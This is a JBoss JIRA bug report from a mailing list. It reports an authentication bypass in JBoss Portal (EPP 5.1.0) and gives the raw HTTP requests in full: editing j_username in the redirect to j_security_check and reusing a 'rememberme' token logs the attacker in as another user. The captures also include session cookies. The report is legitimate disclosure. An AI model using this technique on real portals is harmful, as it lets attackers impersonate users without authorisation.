[jboss-jira] [JBoss JIRA] (JBPORTAL-2496) bypass authentication

Wells guo (JIRA) jira-events at lists.jboss.org
Mon Dec 9 01:42:06 EST 2013 

Wells guo created JBPORTAL-2496:
-----------------------------------

             Summary:  bypass authentication
                 Key: JBPORTAL-2496
                 URL: https://issues.jboss.org/browse/JBPORTAL-2496
             Project: JBoss Portal
          Issue Type: Bug
      Security Level: Public (Everyone can see)
         Environment: EPP 5.1.0
            Reporter: Wells guo


Steps to Reproduce:

1. Log into our portal project with correct username and password

 

POST /portal/login HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer:http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout

Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

 

initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx

 

2. Get a 302 response and open the /portal/private/project/home page

 

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:19:48 GMT

X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1

Location: http://XXXX//home

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: text/plain; charset=UTF-8

 

GET /portal/private/xxxx/home HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout

Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

Connection: keep-alive

 

3. Get a 302 response again, which redirect to secure check page with the username, modify the username to someone else that is logged in.

 

Original message:

 

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:29:42 GMT

Pragma: No-cache

Cache-Control: no-cache

Expires: Wed, 31 Dec 1969 19:00:00 EST

Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746

  ^^^^^^^^^^^^^^^^^

Content-Type: text/html;charset=UTF-8

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

 

 

Modified message:

 

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:29:42 GMT

Pragma: No-cache

Cache-Control: no-cache

Expires: Wed, 31 Dec 1969 19:00:00 EST

Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_password=rememberme1447024746

  ^^^^^^^^^^^^^^^^

Content-Type: text/html;charset=UTF-8

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

 

 

4. Send GET request to get the page in "Location" of step3, which is with username "userB"

 

GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1

^^^^^^^^^^^^^^^^^^

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:action=Logout

Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

Connection: keep-alive

 

5. Get the response with code 302 and redirect to home page , attchment1.

 

6. Click content tab in the home page, it will display now login with "userB", and operations can be performed as userB too,

 

 

Actual results:

Successfully bypass authentication.

 

 

Expected results:

Should not log into the project with "userB" successfully.

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira

More information about the jboss-jira mailing list